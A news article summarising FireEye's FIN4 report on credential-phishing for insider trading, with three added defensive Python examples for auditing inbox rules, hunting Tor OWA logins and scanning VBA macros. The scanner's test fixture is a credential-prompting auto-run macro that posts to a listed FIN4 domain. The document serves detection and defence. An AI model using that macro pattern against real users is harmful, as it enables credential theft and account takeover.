FireEye researchers released a report (pdf) detailing how Wall Street-savvy attackers have been hacking into the email accounts of more than 100 companies involved in market-sensitive financial deals in order to glean insider information that can be used to move stock prices. The group, dubbed FIN4, has been active since mid-2013, primarily targeting healthcare and pharmaceutical firms, as well as the researchers, scientists, lawyers, investment bankers and other advisory firms that work with them. FireEye believes FIN4 is made up of native English speakers with a deep understanding of Wall Street and of how to make or break stock prices.
Instead of using malware, FIN4 gathers insider information with spearphishing emails that lure “victims into opening weaponized documents and entering their email credentials.” After hijacking an email account that corresponds with a similar firm or advisory company about “market-moving, non-public matters,” FIN4 takes over the existing email thread and uses it to send a spearphishing email to the second firm. The FireEye report delves into FIN4’s tactics as well as security measures to help thwart them.
FIN4 uses Visual Basic for Applications (VBA) macros to “embed malicious code into already existing and legitimate company documents. Embedded in each Microsoft Word or Excel document is a malicious macro that prompts the user for their Outlook credentials.” The prompt, which imitates a Windows Security dialog, reads “Your Outlook session has expired. Please log in to continue.” The report states, “Many of the fake Outlook windows opened by the macros contain the logo of the company targeted giving the pop-up apparent legitimacy…Only after credentials are entered will the document appear for the user.”
FireEye noted that the “group sends emails with links to fake Outlook Web App (OWA) login pages that will also steal the user’s credentials,” but FIN4 hasn’t used that tactic “in recent months.”
Another FIN4 tactic for avoiding detection is to create Microsoft Outlook rules in the compromised mailbox that automatically delete incoming emails containing specific keywords, such as phishing, hacked or malware. The report includes a screenshot of such a rule.
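A mailbox-rule audit is the natural counter to this trick. The following is an added example, not code from the FireEye report: it flags enabled inbox rules that delete mail (or move it to Deleted Items) when the subject or body contains security watchwords. The rule records are constructed to mirror the property names Exchange's Get-InboxRule cmdlet exposes (Name, Enabled, DeleteMessage, MoveToFolder, SubjectOrBodyContainsWords and so on), as you would get from `Get-InboxRule -Mailbox <user> | ConvertTo-Json`; that export shape and the keyword list are assumptions.

```python
"""Audit mailbox inbox rules for the FIN4 keyword-deletion evasion.

Added example (not FireEye's code). Input is a JSON array of rule objects whose
property names follow Exchange's Get-InboxRule output (an assumption); the
sample below is constructed for illustration.
"""
import json

# Keywords a compromised user's colleagues or IT staff would put in a warning.
SUSPECT_KEYWORDS = {"phishing", "phish", "hacked", "malware", "virus", "suspicious"}

# Constructed export: one FIN4-style rule, one benign rule, one rule that hides
# rather than deletes, and one disabled rule.
SAMPLE_RULES_JSON = json.dumps([
    {"Name": "Cleanup", "Enabled": True, "DeleteMessage": True,
     "SubjectOrBodyContainsWords": ["phishing", "hacked", "malware"]},
    {"Name": "Newsletters", "Enabled": True, "DeleteMessage": False,
     "MoveToFolder": "user:\\Archive", "SubjectContainsWords": ["newsletter"]},
    {"Name": "Hide IT notices", "Enabled": True, "DeleteMessage": False,
     "MoveToFolder": "user:\\Deleted Items", "BodyContainsWords": ["Malware Alert"]},
    {"Name": "Old rule", "Enabled": False, "DeleteMessage": True,
     "SubjectContainsWords": ["virus"]},
])

# Conditions that match on message text; sender-based conditions are ignored here.
CONDITION_FIELDS = ("SubjectContainsWords", "BodyContainsWords",
                    "SubjectOrBodyContainsWords")


def rule_hides_mail(rule):
    """True if the rule discards mail outright or drops it into Deleted Items."""
    folder = (rule.get("MoveToFolder") or "").lower()
    return bool(rule.get("DeleteMessage")) or "deleted items" in folder


def matched_keywords(rule, keywords):
    """Return the rule's text conditions that contain any suspect keyword."""
    words = []
    for field in CONDITION_FIELDS:
        words.extend(rule.get(field) or [])
    return sorted({w for w in words if any(k in w.lower() for k in keywords)})


def find_evasion_rules(rules_json, keywords=SUSPECT_KEYWORDS, include_disabled=False):
    """Return (rule name, matched words) for rules that hide security warnings."""
    findings = []
    for rule in json.loads(rules_json):
        if not rule.get("Enabled") and not include_disabled:
            continue
        if not rule_hides_mail(rule):
            continue
        hits = matched_keywords(rule, keywords)
        if hits:
            findings.append((rule["Name"], hits))
    return findings


if __name__ == "__main__":
    for name, words in find_evasion_rules(SAMPLE_RULES_JSON):
        print(f"suspicious rule {name!r}: hides mail containing {words}")
```

Disabled rules are skipped by default but can be included with `include_disabled=True`; an attacker who has lost access sometimes leaves a dormant rule behind, so reviewing those during incident response is worthwhile.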
FireEye counted 70 unique campaigns to steal usernames and passwords, with malicious credential prompts targeting “scientists and research” staff as well as CEOs, CFOs, COOs and corporate development personnel. Once the victim enters his or her credentials, they are transmitted to the group’s command-and-control (C2) server; FIN4 then uses the stolen credentials to log in to the victim’s email account and read private communications. The compromised account also lets the attackers send malicious documents “to targets inside and outside the victim company.”
Not only does FIN4 have a strong grasp of how to game the stock market; the group is also skilled at social engineering, as in the following example from the FireEye report.
Figure 4 shows the group’s strong command of an executive’s concerns over illicit public disclosure, particularly over executive incompetence and compensation issues. This email came from an account that FIN4 hijacked at a public company and includes several watchwords: “disclosure” of “confidential company information regarding pending transactions.” These specific issues are key terms at public companies, where the public disclosure of sensitive business information is strictly regulated.
FireEye’s suggested security measures to thwart FIN4 tactics
FireEye recommends disabling VBA macros in Microsoft Office by default and enabling “two-factor authentication of OWA and any other remote access mechanisms.” Additionally, it was advised to block the following nine domains: ellismikepage[.]info, rpgallerynow[.]info, msoutexchange[.]us, outlookscansafe[.]net, outlookexchange[.]net, lifehealthsanfrancisco2015[.]com, dmforever[.]biz, junomaat81[.]us, nickgoodsite.co[.]uk.
Since FIN4 tends to use Tor to log in to victims’ email accounts after obtaining their credentials, FireEye advises checking network logs for OWA logins from known Tor exit nodes, as “legitimate users” do not need Tor to access email. Below are two User Agents that can be "used to identify potentially suspicious OWA activity in network logs when paired with originating Tor IP addresses:"
Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0
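Here is what that check looks like when run over web-server logs. This is an added example, not code from the FireEye report: it parses OWA requests from IIS W3C-format log lines, flags any login that originates from a Tor exit node, and raises the confidence when the request also carries one of the two user agents above. The log lines and the Tor exit list are constructed for the example; in practice you would load the Tor Project's current bulk exit list and point the function at your real Exchange front-end logs (those are assumptions, as is the exact field layout of the log).

```python
"""Hunt OWA logs for logins from Tor exit nodes carrying the FIN4 user agents.

Added example (not FireEye's code). Log lines are constructed in IIS W3C
format, in which spaces inside the User-Agent field are written as '+'.
"""
from ipaddress import ip_address

# The two user agents FireEye associates with FIN4 OWA sessions.
FIN4_USER_AGENTS = {
    "Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0",
    "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0",
}

# Constructed stand-in for a current Tor exit-node list (assumption: load the
# real list from the Tor Project's bulk exit list in production).
TOR_EXIT_NODES = {"198.51.100.23", "203.0.113.77"}

# Constructed IIS log excerpt: date time c-ip cs-method cs-uri-stem sc-status cs(User-Agent)
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status cs(User-Agent)
2014-11-20 02:14:07 198.51.100.23 POST /owa/auth.owa 302 Mozilla/5.0+(Windows+NT+6.1;+rv:31.0)+Gecko/20100101+Firefox/31.0
2014-11-20 08:02:55 192.0.2.10 POST /owa/auth.owa 302 Mozilla/5.0+(Windows+NT+6.3;+WOW64;+Trident/7.0;+rv:11.0)+like+Gecko
2014-11-20 09:41:12 203.0.113.77 POST /owa/auth.owa 302 Mozilla/5.0+(Windows+NT+6.3;+WOW64;+Trident/7.0;+rv:11.0)+like+Gecko
2014-11-20 10:05:30 192.0.2.44 POST /owa/auth.owa 302 Mozilla/5.0+(Windows+NT+6.1;+rv:31.0)+Gecko/20100101+Firefox/31.0
2014-11-20 10:06:02 198.51.100.23 GET /ecp/ 200 Mozilla/5.0+(Windows+NT+6.1;+rv:31.0)+Gecko/20100101+Firefox/31.0
"""


def parse_iis_line(line):
    """Return (ip, method, uri, status, user_agent), or None for headers/blank lines."""
    if not line or line.startswith("#"):
        return None
    parts = line.split(" ", 6)
    if len(parts) != 7:
        return None
    _date, _time, ip, method, uri, status, ua = parts
    return ip, method, uri, status, ua.replace("+", " ")


def find_suspicious_owa_logins(log_text, tor_exits=TOR_EXIT_NODES):
    """Flag OWA requests from Tor exits; FIN4 user agent raises confidence.

    A FIN4 user agent on its own is not flagged: those Firefox strings are
    common, and FireEye's guidance pairs them with a Tor source address.
    """
    findings = []
    for line in log_text.splitlines():
        rec = parse_iis_line(line)
        if rec is None:
            continue
        ip, _method, uri, _status, ua = rec
        if not uri.lower().startswith("/owa"):
            continue
        ip_address(ip)  # fail loudly on a malformed address field
        if ip in tor_exits:
            findings.append({
                "ip": ip,
                "uri": uri,
                "user_agent": ua,
                "confidence": "high" if ua in FIN4_USER_AGENTS else "medium",
            })
    return findings


if __name__ == "__main__":
    for f in find_suspicious_owa_logins(SAMPLE_LOG):
        print(f"{f['confidence']:6} {f['ip']:15} {f['uri']} {f['user_agent']}")
```

The medium-confidence hit (a Tor login with an ordinary user agent) is still worth a look, since the report's point is that legitimate users have no reason to reach OWA over Tor at all.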
FireEye posted indicators on GitHub that organizations can use to help detect FIN4 activity. One identifies Office documents containing the MACROCHECK credential stealer. “It can be run against .doc files or VBA macros extracted from .docx files (vbaProject.bin files).” The indicators also include DNS entries for the domains controlled by the FIN4 group.
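To show the kind of traits such a document indicator keys on, here is an added heuristic scanner; it is not FireEye's MACROCHECK IOC and does not reproduce it. It runs over VBA source text (as extracted from a .doc, or from a .docx's vbaProject.bin, by a tool such as olevba, which is an assumed step) and looks for the combination the report describes: an auto-run entry point, the fake “session has expired” prompt, an HTTP client to send the captured credentials out, and any of the nine domains FireEye listed. The two VBA samples are constructed fixtures for the scanner, not real FIN4 macros.

```python
"""Heuristic scan of extracted VBA for a FIN4-style credential-prompt macro.

Added example, NOT FireEye's MACROCHECK indicator. Operates on VBA source text
already extracted from the document (e.g. with olevba, an assumed step).
"""
import re

# The domains FireEye recommended blocking; any reference in a macro is decisive.
FIN4_DOMAINS = [
    "ellismikepage.info", "rpgallerynow.info", "msoutexchange.us",
    "outlookscansafe.net", "outlookexchange.net",
    "lifehealthsanfrancisco2015.com", "dmforever.biz", "junomaat81.us",
    "nickgoodsite.co.uk",
]

CHECKS = {
    # Macro runs as soon as the document or workbook is opened.
    "autorun": re.compile(r"\b(AutoOpen|Auto_Open|Document_Open|Workbook_Open)\b", re.I),
    # The exact lure text the report quotes.
    "prompt_text": re.compile(r"Your Outlook session has expired", re.I),
    # Something that collects typed input (a form or input box).
    "credential_ui": re.compile(r"\b(InputBox|UserForm\w*\.Show|PasswordChar)\b", re.I),
    # A way to ship the credentials to the C2 server.
    "http_client": re.compile(r"(MSXML2\.(Server)?XMLHTTP|WinHttp\.WinHttpRequest|URLDownloadToFile)", re.I),
    "fin4_domain": re.compile("|".join(re.escape(d) for d in FIN4_DOMAINS), re.I),
}

# Constructed fixture carrying the traits above (not a real FIN4 macro).
SAMPLE_VBA = '''\
Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
    Dim creds As String
    creds = InputBox("Your Outlook session has expired. Please log in to continue.", "Windows Security")
    Dim http As Object
    Set http = CreateObject("MSXML2.XMLHTTP")
    http.Open "POST", "http://outlookscansafe.net/", False
End Sub
'''

# Constructed benign macro for contrast.
BENIGN_VBA = '''\
Sub FormatReport()
    Range("A1:D1").Font.Bold = True
    Columns("A:D").AutoFit
End Sub
'''


def scan_vba(vba_text):
    """Return {'verdict': 'suspicious'|'clean', 'hits': {check: bool}}."""
    hits = {name: bool(rx.search(vba_text)) for name, rx in CHECKS.items()}
    # The quoted prompt text or a listed C2 domain is enough on its own;
    # otherwise require the whole chain: auto-run, an input prompt, and HTTP.
    if hits["prompt_text"] or hits["fin4_domain"]:
        verdict = "suspicious"
    elif hits["autorun"] and hits["credential_ui"] and hits["http_client"]:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "hits": hits}


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        result = scan_vba(src)
        print(label, result["verdict"], [k for k, v in result["hits"].items() if v])
```

The chain rule (auto-run plus input prompt plus HTTP client) is what keeps the scanner useful once the attacker changes the lure text or registers new domains; the string and domain checks are there because, when they do fire, they are near-certain matches.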
FireEye's full report on FIN4 is here (pdf).